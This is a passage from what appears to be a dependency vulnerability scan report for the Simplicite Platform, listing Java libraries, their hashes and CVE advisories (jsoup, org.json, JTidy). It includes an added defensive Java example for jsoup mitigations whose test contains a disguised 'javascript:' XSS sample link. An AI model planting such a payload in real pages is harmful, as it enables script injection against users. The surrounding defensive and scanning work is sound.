win32 Highest Product Manifest automatic-module-name com.sun.jna Medium Product Manifest bundle-activationpolicy lazy Low Product Manifest bundle-category jni Low Product Manifest Bundle-Name jna Medium Product Manifest bundle-nativecode com/sun/jna/win32-x86/jnidispatch.dll; processor=x86;osname=win32, com/sun/jna/win32-x86-64/jnidispatch.dll; processor=x86-64;osname=win32, com/sun/jna/win32-x86/jnidispatch.dll; processor=x86;osname=win, com/sun/jna/win32-x86-64/jnidispatch.dll; processor=x86-64;osname=win, com/sun/jna/w32ce-arm/jnidispatch.dll; processor=arm;osname=wince, com/sun/jna/sunos-x86/libjnidispatch.so; processor=x86;osname=sunos, com/sun/jna/sunos-x86-64/libjnidispatch.so; processor=x86-64;osname=sunos, com/sun/jna/sunos-sparc/libjnidispatch.so; processor=sparc;osname=sunos, com/sun/jna/sunos-sparcv9/libjnidispatch.so; processor=sparcv9;osname=sunos, com/sun/jna/aix-ppc/libjnidispatch.a; processor=ppc;osname=aix, com/sun/jna/aix-ppc64/libjnidispatch.a; processor=ppc64;osname=aix, com/sun/jna/linux-ppc/libjnidispatch.so; processor=ppc;osname=linux, com/sun/jna/linux-ppc64/libjnidispatch.so; processor=ppc64;osname=linux, com/sun/jna/linux-ppc64le/libjnidispatch.so; processor=ppc64le;osname=linux, com/sun/jna/linux-x86/libjnidispatch.so; processor=x86;osname=linux, com/sun/jna/linux-x86-64/libjnidispatch.so; processor=x86-64;osname=linux, com/sun/jna/linux-arm/libjnidispatch.so; processor=arm;osname=linux, com/sun/jna/linux-armel/libjnidispatch.so; processor=armel;osname=linux, com/sun/jna/linux-aarch64/libjnidispatch.so; processor=aarch64;osname=linux, com/sun/jna/linux-ia64/libjnidispatch.so; processor=ia64;osname=linux, com/sun/jna/linux-sparcv9/libjnidispatch.so; processor=sparcv9;osname=linux, com/sun/jna/linux-mips64el/libjnidispatch.so; processor=mips64el;osname=linux, com/sun/jna/linux-s390x/libjnidispatch.so; processor=S390x;osname=linux, com/sun/jna/freebsd-x86/libjnidispatch.so; processor=x86;osname=freebsd, com/sun/jna/freebsd-x86-64/libjnidispatch.so; processor=x86-64;osname=freebsd, com/sun/jna/openbsd-x86/libjnidispatch.so; processor=x86;osname=openbsd, com/sun/jna/openbsd-x86-64/libjnidispatch.so; processor=x86-64;osname=openbsd, com/sun/jna/darwin/libjnidispatch.jnilib; osname=macosx;processor=x86;processor=x86-64;processor=ppc Low Product Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Product Manifest bundle-symbolicname com.sun.jna Medium Product Manifest Implementation-Title com.sun.jna High Product Manifest specification-title Java Native Access (JNA) Medium Product pom artifactid jna Highest Product pom developer email mblaesing@doppel-helix.eu Low Product pom developer id twall Low Product pom developer name Matthias Bläsing Low Product pom developer name Timothy Wall Low Product pom groupid net.java.dev.jna Highest Product pom name Java Native Access High Product pom url java-native-access/jna High Version file version 5.3.1 High Version Manifest Bundle-Version 5.3.1 High Version pom version 5.3.1 Highest
jna-5.3.1.jar: jnidispatch.dll
File Path: /var/simplicite/.m2/repository/net/java/dev/jna/jna/5.3.1/jna-5.3.1.jar/com/sun/jna/win32-x86-64/jnidispatch.dll
MD5: 3c016613eb59259f94e2add2b8d926c0
SHA1: e26183f9919ed1daf5c1856c16f8a074bd9ef6dc
SHA256: df09119557efe5a5fc2237996b09c3da34fb60eb3ff0c6a5b2a35ec4212e0119
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jnidispatch High Product file name jnidispatch High
jna-5.3.1.jar: jnidispatch.dll
File Path: /var/simplicite/.m2/repository/net/java/dev/jna/jna/5.3.1/jna-5.3.1.jar/com/sun/jna/win32-x86/jnidispatch.dll
MD5: 391d7cbfc2c03d0be890541004e6a0ac
SHA1: 1a48c577532b6dbec44b5401fa8268a86daa35b0
SHA256: 2d0342e81527fc07255f6585e7de2e89dcd33b2ccf3e770eb83889353265cec3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jnidispatch High Product file name jnidispatch High
joda-time-2.10.3.jar
Description:
Date and time library to replace JDK date handling
License:
Apache License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/joda-time/joda-time/2.10.3/joda-time-2.10.3.jar
MD5: c7d774a821ec6b1a923d82563d657e2b
SHA1: 2e5366cf1f77ca3bafffecf6e87d30e1d504e959
SHA256: ebb6a6aade36fba2e5aa3f2b98ff9904f20f6f59db1ec6513be5e97d0c578e89
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name joda-time High Vendor jar package name joda Highest Vendor jar package name time Highest Vendor Manifest automatic-module-name org.joda.time Medium Vendor Manifest bundle-docurl https://www.joda.org/joda-time/ Low Vendor Manifest bundle-symbolicname joda-time Medium Vendor Manifest extension-name joda-time Medium Vendor Manifest implementation-url https://www.joda.org/joda-time/ Low Vendor Manifest Implementation-Vendor Joda.org High Vendor Manifest Implementation-Vendor-Id org.joda Medium Vendor Manifest specification-vendor Joda.org Low Vendor pom artifactid joda-time Highest Vendor pom artifactid joda-time Low Vendor pom developer id broneill Medium Vendor pom developer id jodastephen Medium Vendor pom developer name Brian S O'Neill Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom groupid joda-time Highest Vendor pom name Joda-Time High Vendor pom organization name Joda.org High Vendor pom organization url https://www.joda.org Medium Vendor pom url https://www.joda.org/joda-time/ Highest Product file name joda-time High Product jar package name joda Highest Product jar package name time Highest Product Manifest automatic-module-name org.joda.time Medium Product Manifest bundle-docurl https://www.joda.org/joda-time/ Low Product Manifest Bundle-Name Joda-Time Medium Product Manifest bundle-symbolicname joda-time Medium Product Manifest extension-name joda-time Medium Product Manifest Implementation-Title org.joda.time High Product Manifest implementation-url https://www.joda.org/joda-time/ Low Product Manifest specification-title Joda-Time Medium Product pom artifactid joda-time Highest Product pom developer id broneill Low Product pom developer id jodastephen Low Product pom developer name Brian S O'Neill Low Product pom developer name Stephen Colebourne Low Product pom groupid joda-time Highest Product pom name Joda-Time High Product pom organization name Joda.org Low Product pom organization url https://www.joda.org Low Product pom url https://www.joda.org/joda-time/ Medium Version file version 2.10.3 High Version Manifest Bundle-Version 2.10.3 High Version Manifest Implementation-Version 2.10.3 High Version pom version 2.10.3 Highest
jsch-0.1.55.jar
Description:
JSch is a pure Java implementation of SSH2
License:
Revised BSD: http://www.jcraft.com/jsch/LICENSE.txt
File Path: /var/simplicite/.m2/repository/com/jcraft/jsch/0.1.55/jsch-0.1.55.jar
MD5: c395ada0fc012d66f11bd30246f6c84d
SHA1: bbd40e5aa7aa3cfad5db34965456cee738a42a50
SHA256: d492b15a6d2ea3f1cc39c422c953c40c12289073dbe8360d98c0f6f9ec74fc44
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jsch High Vendor jar package name jcraft Highest Vendor jar package name jcraft Low Vendor jar package name jsch Highest Vendor jar package name jsch Low Vendor pom artifactid jsch Highest Vendor pom artifactid jsch Low Vendor pom developer email ymnk at jcraft D0t com Low Vendor pom developer id ymnk Medium Vendor pom developer name Atsuhiko Yamanaka Medium Vendor pom developer org JCraft,Inc. Medium Vendor pom developer org URL http://www.jcraft.com/ Medium Vendor pom groupid com.jcraft Highest Vendor pom name JSch High Vendor pom organization name JCraft,Inc. High Vendor pom organization url http://www.jcraft.com/ Medium Vendor pom url http://www.jcraft.com/jsch/ Highest Product file name jsch High Product jar package name jcraft Highest Product jar package name jsch Highest Product jar package name jsch Low Product pom artifactid jsch Highest Product pom developer email ymnk at jcraft D0t com Low Product pom developer id ymnk Low Product pom developer name Atsuhiko Yamanaka Low Product pom developer org JCraft,Inc. Low Product pom developer org URL http://www.jcraft.com/ Low Product pom groupid com.jcraft Highest Product pom name JSch High Product pom organization name JCraft,Inc. Low Product pom organization url http://www.jcraft.com/ Low Product pom url http://www.jcraft.com/jsch/ Medium Version file version 0.1.55 High Version pom version 0.1.55 Highest
json-20190722.jar
Description:
JSON is a light-weight, language independent, data interchange format.
See http://www.JSON.org/
The files in this package implement JSON encoders/decoders in Java.
It also includes the capability to convert between JSON and XML, HTTP
headers, Cookies, and CDL.
This is a reference implementation. There is a large number of JSON packages
in Java. Perhaps someday the Java community will standardize on one. Until
then, choose carefully.
The license includes this restriction: "The software shall be used for good,
not evil." If your conscience cannot live with that, then choose a different
package.
License:
The JSON License: http://json.org/license.html
File Path: /var/simplicite/.m2/repository/org/json/json/20190722/json-20190722.jar
MD5: cdb0aa1fd126bc94b34da5856b57f13a
SHA1: 07bce7bacf0ab5e9f894d307a3de8b7f540064d5
SHA256: e35b3830de02a8992ca8beb6936f52ee80e509753d64469c8f0dde93e17a880b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name json-20190722 High Vendor jar package name cdl Highest Vendor jar package name http Highest Vendor jar package name json Highest Vendor jar package name xml Highest Vendor Manifest automatic-module-name org.json Medium Vendor Manifest bundle-symbolicname json Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid json Highest Vendor pom artifactid json Low Vendor pom developer email douglas@crockford.com Low Vendor pom developer name Douglas Crockford Medium Vendor pom groupid org.json Highest Vendor pom name JSON in Java High Vendor pom url douglascrockford/JSON-java Highest Product file name json-20190722 High Product jar package name cdl Highest Product jar package name http Highest Product jar package name json Highest Product jar package name xml Highest Product Manifest automatic-module-name org.json Medium Product Manifest Bundle-Name JSON in Java Medium Product Manifest bundle-symbolicname json Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid json Highest Product pom developer email douglas@crockford.com Low Product pom developer name Douglas Crockford Low Product pom groupid org.json Highest Product pom name JSON in Java High Product pom url douglascrockford/JSON-java High Version file version 20190722 Medium Version pom version 20190722 Highest
CVE-2022-45688
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.
CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-5072
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
json-simple-1.1.1.jar
Description:
A simple Java toolkit for JSON
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/googlecode/json-simple/json-simple/1.1.1/json-simple-1.1.1.jar
MD5: 5cc2c478d73e8454b4c369cee66c5bc7
SHA1: c9ad4a0850ab676c5c64461a05ca524cdfff59f1
SHA256: 4e69696892b88b41c55d49ab2fdcc21eead92bf54acc588c0050596c3b75199c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name json-simple High Vendor jar package name json Highest Vendor jar package name simple Highest Vendor Manifest bundle-symbolicname com.googlecode.json-simple Medium Vendor pom artifactid json-simple Highest Vendor pom artifactid json-simple Low Vendor pom developer id Yidong Medium Vendor pom developer name Yidong Fang Medium Vendor pom groupid com.googlecode.json-simple Highest Vendor pom name JSON.simple High Vendor pom url http://code.google.com/p/json-simple/ Highest Product file name json-simple High Product jar package name json Highest Product jar package name simple Highest Product Manifest Bundle-Name JSON.simple Medium Product Manifest bundle-symbolicname com.googlecode.json-simple Medium Product pom artifactid json-simple Highest Product pom developer id Yidong Low Product pom developer name Yidong Fang Low Product pom groupid com.googlecode.json-simple Highest Product pom name JSON.simple High Product pom url http://code.google.com/p/json-simple/ Medium Version file version 1.1.1 High Version Manifest Bundle-Version 1.1.1 High Version pom version 1.1.1 Highest
jsoup-1.12.1.jar
Description: jsoup is a Java library for working with real-world HTML. It provides a very convenient API for extracting and manipulating data, using the best of DOM, CSS, and jquery-like methods. jsoup implements the WHATWG HTML5 specification, and parses HTML to the same DOM as modern browsers do.
License: The MIT License: https://jsoup.org/license
File Path: /var/simplicite/.m2/repository/org/jsoup/jsoup/1.12.1/jsoup-1.12.1.jar
MD5: 79bb9e9e8b50ef80a18bd46426befc5a
SHA1: 55819a28fc834c2f2bcf4dcdb278524dc3cf088f
SHA256: 4f961f68e47740dd7576c9685774a7b25b92f1017af24e2f707b30e893abade3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | jsoup | High
Vendor | jar | package name | jsoup | Highest
Vendor | jar | package name | parser | Highest
Vendor | Manifest | automatic-module-name | org.jsoup | Medium
Vendor | Manifest | bundle-docurl | https://jsoup.org/ | Low
Vendor | Manifest | bundle-symbolicname | org.jsoup | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Vendor | pom | artifactid | jsoup | Highest
Vendor | pom | artifactid | jsoup | Low
Vendor | pom | developer email | jonathan@hedley.net | Low
Vendor | pom | developer id | jhy | Medium
Vendor | pom | developer name | Jonathan Hedley | Medium
Vendor | pom | groupid | org.jsoup | Highest
Vendor | pom | name | jsoup Java HTML Parser | High
Vendor | pom | organization name | Jonathan Hedley | High
Vendor | pom | organization url | https://jhy.io/ | Medium
Vendor | pom | url | https://jsoup.org/ | Highest
Product | file | name | jsoup | High
Product | jar | package name | jsoup | Highest
Product | jar | package name | parser | Highest
Product | Manifest | automatic-module-name | org.jsoup | Medium
Product | Manifest | bundle-docurl | https://jsoup.org/ | Low
Product | Manifest | Bundle-Name | jsoup Java HTML Parser | Medium
Product | Manifest | bundle-symbolicname | org.jsoup | Medium
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Product | pom | artifactid | jsoup | Highest
Product | pom | developer email | jonathan@hedley.net | Low
Product | pom | developer id | jhy | Low
Product | pom | developer name | Jonathan Hedley | Low
Product | pom | groupid | org.jsoup | Highest
Product | pom | name | jsoup Java HTML Parser | High
Product | pom | organization name | Jonathan Hedley | Low
Product | pom | organization url | https://jhy.io/ | Low
Product | pom | url | https://jsoup.org/ | Medium
Version | file | version | 1.12.1 | High
Version | Manifest | Bundle-Version | 1.12.1 | High
Version | pom | version | 1.12.1 | Highest
CVE-2021-37714
jsoup is a Java library for working with HTML. Those using jsoup versions prior to 1.14.2 to parse untrusted HTML or XML may be vulnerable to DoS attacks. If the parser is run on user-supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more slowly than usual, or to throw an unexpected exception. This effect may support a denial of service attack. The issue is patched in version 1.14.2. There are a few available workarounds. Users may rate limit input parsing, limit the size of inputs based on system resources, and/or implement thread watchdogs to cap and timeout parse runtimes.
CWE-248 Uncaught Exception, CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-36033
jsoup is a Java HTML parser, built for HTML editing, cleaning, scraping, and cross-site scripting (XSS) safety. jsoup may incorrectly sanitize HTML including `javascript:` URL expressions, which could allow XSS attacks when a reader subsequently clicks that link. If the non-default `SafeList.preserveRelativeLinks` option is enabled, HTML including `javascript:` URLs that have been crafted with control characters will not be sanitized. If the site that this HTML is published on does not set a Content Security Policy, an XSS attack is then possible. This issue is patched in jsoup 1.15.3. Users should upgrade to this version. Additionally, as the unsanitized input may have been persisted, old content should be cleaned again using the updated version. To remediate this issue without immediately upgrading: disable `SafeList.preserveRelativeLinks`, which will rewrite input URLs as absolute URLs, and ensure an appropriate Content Security Policy (https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) is defined. (This should be used regardless of upgrading, as a defence-in-depth best practice.)
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3: Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
References:
Vulnerable Software & Versions:
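Both jsoup advisories above come down to how untrusted markup reaches the parser and the cleaner. The following added example (not Simplicité or jsoup project code) shows the workarounds the advisories name in one place: an input-size cap and a watchdog that abandons a parse exceeding a wall-clock budget (the CVE-2021-37714 workarounds), and cleaning with `preserveRelativeLinks` left disabled against an absolute base URI so every link is resolved and protocol-checked before it is kept (the CVE-2022-36033 mitigation). It targets jsoup 1.15.3 or later, where the safelist class is spelled `Safelist`; the 1.12.1 build scanned here names the equivalent class `Whitelist`, with the same `preserveRelativeLinks` method. The limits, the class name `UntrustedHtml`, the pool size and the sample link are assumptions chosen for illustration; the sample input is constructed and is not a reproduction of the advisory's bypass.

```java
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;

import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.safety.Safelist;

/** Added example: bounded parsing and strict link cleaning for untrusted HTML. */
public final class UntrustedHtml {

    // Assumed limits; tune them to the deployment.
    private static final int MAX_INPUT_CHARS = 256 * 1024;
    private static final long PARSE_TIMEOUT_MS = 2_000;

    // Small fixed pool of daemon threads: a parse that ignores the interrupt
    // occupies one worker, but cannot keep the JVM alive or spawn more threads.
    private static final ExecutorService PARSERS = Executors.newFixedThreadPool(4, r -> {
        Thread t = new Thread(r, "jsoup-parser");
        t.setDaemon(true);
        return t;
    });

    /** Parse with an input-size cap and a wall-clock cap (CVE-2021-37714 workarounds). */
    public static Document parseBounded(String untrustedHtml, String baseUri)
            throws TimeoutException, InterruptedException {
        if (untrustedHtml.length() > MAX_INPUT_CHARS) {
            throw new IllegalArgumentException("HTML input exceeds " + MAX_INPUT_CHARS + " chars");
        }
        Future<Document> job = PARSERS.submit(() -> Jsoup.parse(untrustedHtml, baseUri));
        try {
            return job.get(PARSE_TIMEOUT_MS, TimeUnit.MILLISECONDS);
        } catch (TimeoutException e) {
            job.cancel(true); // ask the worker to stop; the caller gives up regardless
            throw e;
        } catch (ExecutionException e) {
            // The parser threw (the advisory's "unexpected exception" case): report it
            // as bad input instead of letting it surface as an internal server error.
            throw new IllegalArgumentException("parser rejected input", e.getCause());
        }
    }

    /**
     * Clean for display. With preserveRelativeLinks false (the default), every
     * href and src is resolved against baseUri before the protocol check, so a
     * scheme disguised with control characters cannot pass as a "relative" link.
     * Safelist.basic() permits only ftp, http, https and mailto on a[href].
     */
    public static String cleanForDisplay(String untrustedHtml, String baseUri) {
        Safelist safelist = Safelist.basic().preserveRelativeLinks(false);
        return Jsoup.clean(untrustedHtml, baseUri, safelist);
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample input: a link whose scheme carries an embedded control character.
        String sample = "<p>hi <a href=\"jav\u0001ascript:alert(1)\">click</a></p>";
        String cleaned = cleanForDisplay(sample, "https://example.org/");
        if (cleaned.toLowerCase().contains("javascript:")) {
            throw new IllegalStateException("javascript: scheme survived cleaning: " + cleaned);
        }
        System.out.println(cleaned);
        Document doc = parseBounded(sample, "https://example.org/");
        System.out.println(doc.body().children().size() + " top-level element(s) parsed");
    }
}
```

The fixed pool fails closed: a worker stuck in a pathological parse stays occupied, and once all four are, later submissions queue and time out at `get` rather than spawning threads, which is why the size cap and the rate limiting the advisory also mentions belong in front of this code. The Content Security Policy the second advisory recommends is an HTTP response header and is set outside this class; it remains the backstop if a persisted payload was cleaned by a pre-1.15.3 build, so re-clean stored content after upgrading.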
jsr305-3.0.2.jar
Description: JSR305 Annotations for Findbugs
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/code/findbugs/jsr305/3.0.2/jsr305-3.0.2.jar
MD5: dd83accb899363c32b07d7a1b2e4ce40
SHA1: 25ea2e8b0c338a877313bd4672d3fe056ea78f0d
SHA256: 766ad2a0783f2687962c8ad74ceecc38a28b9f72a2d085ee438b7813e928d0c7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | jsr305 | High
Vendor | Manifest | bundle-symbolicname | org.jsr-305 | Medium
Vendor | pom | artifactid | jsr305 | Highest
Vendor | pom | artifactid | jsr305 | Low
Vendor | pom | groupid | com.google.code.findbugs | Highest
Vendor | pom | name | FindBugs-jsr305 | High
Vendor | pom | url | http://findbugs.sourceforge.net/ | Highest
Product | file | name | jsr305 | High
Product | Manifest | Bundle-Name | FindBugs-jsr305 | Medium
Product | Manifest | bundle-symbolicname | org.jsr-305 | Medium
Product | pom | artifactid | jsr305 | Highest
Product | pom | groupid | com.google.code.findbugs | Highest
Product | pom | name | FindBugs-jsr305 | High
Product | pom | url | http://findbugs.sourceforge.net/ | Medium
Version | file | version | 3.0.2 | High
Version | Manifest | Bundle-Version | 3.0.2 | High
Version | pom | version | 3.0.2 | Highest
jsr311-api-1.1.1.jar
License: CDDL License: http://www.opensource.org/licenses/cddl1.php
File Path: /var/simplicite/.m2/repository/javax/ws/rs/jsr311-api/1.1.1/jsr311-api-1.1.1.jar
MD5: c9803468299ec255c047a280ddec510f
SHA1: 59033da2a1afd56af1ac576750a8d0b1830d59e6
SHA256: ab1534b73b5fa055808e6598a5e73b599ccda28c3159c3c0908977809422ee4a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | jsr311-api | High
Vendor | hint analyzer | vendor | web services | Medium
Vendor | jar | package name | javax | Highest
Vendor | jar | package name | rs | Highest
Vendor | jar | package name | ws | Highest
Vendor | Manifest | bundle-docurl | http://www.sun.com/ | Low
Vendor | Manifest | bundle-symbolicname | javax.ws.rs.jsr311-api | Medium
Vendor | Manifest | extension-name | javax.ws.rs | Medium
Vendor | Manifest | specification-vendor | Sun Microsystems, Inc. | Low
Vendor | pom | artifactid | jsr311-api | Highest
Vendor | pom | artifactid | jsr311-api | Low
Vendor | pom | groupid | javax.ws.rs | Highest
Vendor | pom | name | jsr311-api | High
Vendor | pom | organization name | Sun Microsystems, Inc | High
Vendor | pom | organization url | http://www.sun.com/ | Medium
Vendor | pom | url | https://jsr311.dev.java.net | Highest
Product | file | name | jsr311-api | High
Product | hint analyzer | product | web services | Medium
Product | jar | package name | javax | Highest
Product | jar | package name | rs | Highest
Product | jar | package name | ws | Highest
Product | Manifest | bundle-docurl | http://www.sun.com/ | Low
Product | Manifest | Bundle-Name | jsr311-api | Medium
Product | Manifest | bundle-symbolicname | javax.ws.rs.jsr311-api | Medium
Product | Manifest | extension-name | javax.ws.rs | Medium
Product | Manifest | specification-title | JAX-RS: Java API for RESTful Web Services | Medium
Product | pom | artifactid | jsr311-api | Highest
Product | pom | groupid | javax.ws.rs | Highest
Product | pom | name | jsr311-api | High
Product | pom | organization name | Sun Microsystems, Inc | Low
Product | pom | organization url | http://www.sun.com/ | Low
Product | pom | url | https://jsr311.dev.java.net | Medium
Version | file | version | 1.1.1 | High
Version | Manifest | Bundle-Version | 1.1.1 | High
Version | Manifest | specification-version | 1.1.1 | High
Version | pom | version | 1.1.1 | Highest
jtidy-r938.jar
Description: JTidy is a Java port of HTML Tidy, an HTML syntax checker and pretty printer. Like its non-Java cousin, JTidy can be used as a tool for cleaning up malformed and faulty HTML. In addition, JTidy provides a DOM interface to the document that is being processed, which effectively makes you able to use JTidy as a DOM parser for real-world HTML.
License: Java HTML Tidy License: http://jtidy.svn.sourceforge.net/viewvc/jtidy/trunk/jtidy/LICENSE.txt?revision=95
File Path: /var/simplicite/.m2/repository/net/sf/jtidy/jtidy/r938/jtidy-r938.jar
MD5: 6a9121561b8f98c0a8fb9b6e57f50e6b
SHA1: ab08d87a225a715a69107732b67f21e1da930349
SHA256: 6fc03e51e73fa884f06e7eae0761e045e56fdeb4e146a4d952e3023cc9e3fb43
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | jtidy-r938 | High
Vendor | jar | package name | parser | Highest
Vendor | jar | package name | tidy | Low
Vendor | jar | package name | w3c | Low
Vendor | pom | artifactid | jtidy | Highest
Vendor | pom | artifactid | jtidy | Low
Vendor | pom | developer email | atripp AT users.sourceforge.net | Low
Vendor | pom | developer email | fgiust AT users.sourceforge.net | Low
Vendor | pom | developer email | garypeskin AT users.sourceforge.net | Low
Vendor | pom | developer email | lempinen AT users.sourceforge.net | Low
Vendor | pom | developer email | russgold AT users.sourceforge.net | Low
Vendor | pom | developer id | atripp | Medium
Vendor | pom | developer id | fgiust | Medium
Vendor | pom | developer id | garypeskin | Medium
Vendor | pom | developer id | lempinen | Medium
Vendor | pom | developer id | russgold | Medium
Vendor | pom | developer name | Andy Tripp | Medium
Vendor | pom | developer name | Fabrizio Giustina | Medium
Vendor | pom | developer name | Gary L Peskin | Medium
Vendor | pom | developer name | Russell Gold | Medium
Vendor | pom | developer name | Sami Lempinen | Medium
Vendor | pom | developer org | Sourceforge | Medium
Vendor | pom | groupid | net.sf.jtidy | Highest
Vendor | pom | name | JTidy | High
Vendor | pom | organization name | sourceforge | High
Vendor | pom | organization url | http://sourceforge.net | Medium
Vendor | pom | url | http://jtidy.sourceforge.net | Highest
Product | file | name | jtidy-r938 | High
Product | jar | package name | parser | Highest
Product | jar | package name | tidy | Low
Product | pom | artifactid | jtidy | Highest
Product | pom | developer email | atripp AT users.sourceforge.net | Low
Product | pom | developer email | fgiust AT users.sourceforge.net | Low
Product | pom | developer email | garypeskin AT users.sourceforge.net | Low
Product | pom | developer email | lempinen AT users.sourceforge.net | Low
Product | pom | developer email | russgold AT users.sourceforge.net | Low
Product | pom | developer id | atripp | Low
Product | pom | developer id | fgiust | Low
Product | pom | developer id | garypeskin | Low
Product | pom | developer id | lempinen | Low
Product | pom | developer id | russgold | Low
Product | pom | developer name | Andy Tripp | Low
Product | pom | developer name | Fabrizio Giustina | Low
Product | pom | developer name | Gary L Peskin | Low
Product | pom | developer name | Russell Gold | Low
Product | pom | developer name | Sami Lempinen | Low
Product | pom | developer org | Sourceforge | Low
Product | pom | groupid | net.sf.jtidy | Highest
Product | pom | name | JTidy | High
Product | pom | organization name | sourceforge | Low
Product | pom | organization url | http://sourceforge.net | Low
Product | pom | url | http://jtidy.sourceforge.net | Medium
Version | pom | version | r938 | Highest
CVE-2023-34623
An issue was discovered in JTidy through r938: it allows attackers to cause a denial of service or other unspecified impacts via a crafted object that uses cyclic dependencies.
CWE-787 Out-of-bounds Write
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
jul-to-slf4j-1.7.30.jar
Description: JUL to SLF4J bridge
File Path: /var/simplicite/.m2/repository/org/slf4j/jul-to-slf4j/1.7.30/jul-to-slf4j-1.7.30.jar
MD5: f2c78cb93d70dc5dea0c50f36ace09c1
SHA1: d58bebff8cbf70ff52b59208586095f467656c30
SHA256: bbcbfdaa72572255c4f85207a9bfdb24358dc993e41252331bd4d0913e4988b9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | jul-to-slf4j | High
Vendor | jar | package name | bridge | Highest
Vendor | jar | package name | slf4j | Highest
Vendor | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5 | Low
Vendor | Manifest | bundle-symbolicname | jul.to.slf4j | Medium
Vendor | pom | artifactid | jul-to-slf4j | Highest
Vendor | pom | artifactid | jul-to-slf4j | Low
Vendor | pom | groupid | org.slf4j | Highest
Vendor | pom | name | JUL to SLF4J bridge | High
Vendor | pom | parent-artifactid | slf4j-parent | Low
Vendor | pom | url | http://www.slf4j.org | Highest
Product | file | name | jul-to-slf4j | High
Product | jar | package name | bridge | Highest
Product | jar | package name | slf4j | Highest
Product | Manifest | Bundle-Name | jul-to-slf4j | Medium
Product | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5 | Low
Product | Manifest | bundle-symbolicname | jul.to.slf4j | Medium
Product | pom | artifactid | jul-to-slf4j | Highest
Product | pom | groupid | org.slf4j | Highest
Product | pom | name | JUL to SLF4J bridge | High
Product | pom | parent-artifactid | slf4j-parent | Medium
Product | pom | url | http://www.slf4j.org | Medium
Version | file | version | 1.7.30 | High
Version | Manifest | Bundle-Version | 1.7.30 | High
Version | Manifest | Implementation-Version | 1.7.30 | High
Version | pom | version | 1.7.30 | Highest
junit-4.13.2.jar
Description: JUnit is a unit testing framework for Java, created by Erich Gamma and Kent Beck.
License: Eclipse Public License 1.0: http://www.eclipse.org/legal/epl-v10.html
File Path: /var/simplicite/.m2/repository/junit/junit/4.13.2/junit-4.13.2.jar
MD5: d98a9a02a99a9acd22d7653cbcc1f31f
SHA1: 8ac9e16d933b6fb43bc7f576336b8f4d7eb5ba12
SHA256: 8e495b634469d64fb8acfa3495a065cbacc8a0fff55ce1e31007be4c16dc57d3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | junit | High
Vendor | jar | package name | framework | Highest
Vendor | jar | package name | junit | Highest
Vendor | Manifest | automatic-module-name | junit | Medium
Vendor | Manifest | implementation-url | http://junit.org | Low
Vendor | Manifest | Implementation-Vendor | JUnit | High
Vendor | Manifest | Implementation-Vendor-Id | junit | Medium
